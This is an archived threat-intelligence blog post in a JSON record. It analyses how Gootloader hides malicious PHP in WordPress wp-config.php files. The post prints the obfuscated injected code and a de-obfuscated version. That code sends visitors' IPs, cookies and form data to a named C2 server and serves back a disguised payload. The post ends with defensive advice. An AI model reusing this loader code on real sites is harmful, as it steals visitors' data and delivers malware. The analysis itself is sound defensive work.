{
	"id": "6a210e66-f267-44bc-a3c2-d21beb893e16",
	"created_at": "2026-04-06T00:22:02.804972Z",
	"updated_at": "2026-04-10T13:11:44.924923Z",
	"deleted_at": null,
	"sha1_hash": "63b23b4dda4072ca4de621cf0a909d7b968b4338",
	"title": "Gootloader’s New Hideout Revealed: The Malware Hunt in WordPress’ Shadows",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63541,
	"plain_text": "Gootloader’s New Hideout Revealed: The Malware Hunt in WordPress’\r\nShadows\r\nBy gootloadersites\r\nPublished: 2024-06-24 · Archived: 2026-04-05 13:57:41 UTC\r\nIntro\r\nCybersecurity experts and enthusiasts, brace yourselves! The notorious Gootloader malware is at it again, shifting tactics\r\nand burrowing deeper into compromised WordPress sites. Just when we thought we had them pinned down, they’ve\r\nexecuted a sleight of hand. This blog post uncovers their latest evasion techniques and provides insights into how they’ve\r\nbeen hiding in plain sight.\r\nThe Discovery of the Hidden Gootloader\r\nGootloader has been a persistent threat, known for its crafty use of WordPress blogs to propagate malicious code. Initially,\r\nthese compromised sites called out to the xmlrpc.php file, which was a dead giveaway for those tracking their nefarious\r\nactivities. However, around mid-April, a significant change was detected: the URL call shifted to the main blog URL itself.\r\nThis change threw many of us off the scent, creating a smokescreen that effectively concealed their tracks. The question\r\nlingered: where were they hiding their malicious PHP code now?\r\nThe Hidden Lair: wp-config.php\r\nAfter meticulous investigation and a fair share of digital sleuthing, the answer came to light. The Gootloader masterminds\r\nhave been embedding their malicious PHP code within the wp-config.php file of compromised WordPress installations.\r\nThis file, crucial for WordPress configuration, often goes unnoticed during routine security checks, making it an ideal hiding\r\nspot for cybercriminals.\r\nHere is their obfuscated code:\r\n1\r\n\u003c?php if (isset($_COOKIE)) { if (strpos($_SERVER[\"\\x48\\124\\124\\120\\x5f\\x55\\x53\\x45\\x52\\137\\101\\107\\105\\116\\x54\"],\r\n\"\\x43\\150\\162\\x6f\\155\\145\") !== false) { if (preg_match(\"\\57\\x21\\133\\101\\x2d\\106\\x30\\55\\71\\135\\x7b\\61\\x30\\x7d\\x21\\x2f\",\r\nimplode(\"\\x21\", array_keys($_COOKIE)) . \"\\41\")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,\r\n\"\\x68\\164\\x74\\160\\x73\\72\\x2f\\57\\x74\\145\\x6d\\160\\x6f\\162\\x61\\162\\x79\\56\\x66\\141\\x69\\154\\x2f\\151\\x6e\\144\\x65\\170\\x2e\\160\\x\r\ncurl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIF\r\n0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array(\"\\x69\" =\u003e\r\nserialize($_SERVER[\"\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\x44\\x52\"]), \"\\165\" =\u003e\r\nserialize($_SERVER[\"\\110\\x54\\x54\\x50\\x5f\\x55\\123\\105\\122\\137\\101\\x47\\x45\\x4e\\x54\"]), \"\\x68\" =\u003e\r\nserialize($_SERVER[\"\\x48\\x54\\x54\\x50\\x5f\\110\\117\\x53\\124\"]), \"\\x63\" =\u003e serialize($_COOKIE), \"\\x67\" =\u003e serialize($_GET),\r\nserialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if\r\n(strpos($r, \"\\x47\\111\\x46\\x38\\71\") !== false) {\r\nheader(\"\\x43\\x6f\\156\\x74\\145\\156\\164\\55\\124\\x79\\x70\\x65\\72\\40\\151\\x6d\\141\\x67\\x65\\57\\x67\\x69\\x66\"); echo $r; die; } } }\r\nAnd here is the code de-obfuscated and beautified:\r\n1\r\n2\r\n3\r\n4\r\n\u003c ?php if (isset($_COOKIE)) {\r\nif (strpos($_SERVER[\"HTTP_USER_AGENT\"], \"Chrome\") != = false) {\r\nif (preg_match(\"/![A-F0-9]{10}!/\", \"!\" . implode(\"!\", array_keys($_COOKIE)) . \"!\")) {\r\n$ch = curl_init();\r\nhttps://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/\r\nPage 1 of 3\n\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\ncurl_setopt($ch, CURLOPT_POST, TRUE);\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);\r\n$d = array(\"i\" = \u003e serialize($_SERVER[\"REMOTE_ADDR\"]), \"u\" = \u003e\r\nserialize($_SERVER[\"HTTP_USER_AGENT\"]), \"h\" = \u003e serialize($_SERVER[\"HTTP_HOST\"]), \"c\" = \u003e\r\nserialize($_COOKIE), \"g\" = \u003e serialize($_GET), \"p\" = \u003e serialize($_POST));\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d));\r\n$r = curl_exec($ch);\r\ncurl_close($ch);\r\nif (strpos($r, \"GIF89\") != = false) {\r\nheader(\"Content-Type: image/gif\");\r\necho $r;\r\ndie;\r\n}\r\n}\r\n}\r\n}\r\n? \u003e\r\nThe New C2 Server: temporary.fail/91.215.85.21\r\nBut the discovery didn’t end there. Further analysis revealed that the embedded code in wp-config.php directs to a new\r\nCommand and Control (C2) server: temporary.fail /91.215.85.21. This new server is where the infected sites are now\r\ncommunicating, ensuring the malware’s operations continue without interruption.\r\nImplications and Defense Strategies\r\nThis shift in Gootloader’s tactics underscores the importance of thorough and continuous security monitoring. For those\r\nmanaging WordPress sites, here are some key takeaways to bolster your defenses:\r\n1. Regularly Audit Key Files: Ensure that files like wp-config.php are regularly audited for unauthorized changes.\r\n2. Monitor Network Traffic: Keep an eye on traffic to detect any unusual connections, particularly to unfamiliar C2\r\nservers like temporary.fail /91.215.85.21.\r\n3. Harden WordPress Security: Employ security plugins that can detect and neutralize malware. Regularly update\r\nWordPress, themes and its plugins to patch vulnerabilities.\r\n4. Backup and Recovery: Maintain regular backups and have a recovery plan in place to swiftly restore to a clean\r\nstate, if a compromise is detected.\r\nConclusion\r\nhttps://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/\r\nPage 2 of 3\n\nThe relentless pursuit of hiding places by Gootloader is a stark reminder of the evolving nature of cyber threats. By\r\nuncovering their new tactic of using wp-config.php and directing it to temporary.fail /91.215.85.21, we take a step\r\nforward in the ongoing battle against malware. Stay vigilant, stay informed, and keep your digital fortresses secure.\r\nGootloader’s dark arts may evolve, but with keen eyes and robust security practices, we can continue to unveil their hidden\r\nshadows.\r\nSource: https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/\r\nhttps://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/"
	],
	"report_names": [
		"gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows"
	],
	"threat_actors": [],
	"ts_created_at": 1775434922,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.pdf",
		"text": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.txt",
		"img": "https://archive.orkl.eu/63b23b4dda4072ca4de621cf0a909d7b968b4338.jpg"
	}
}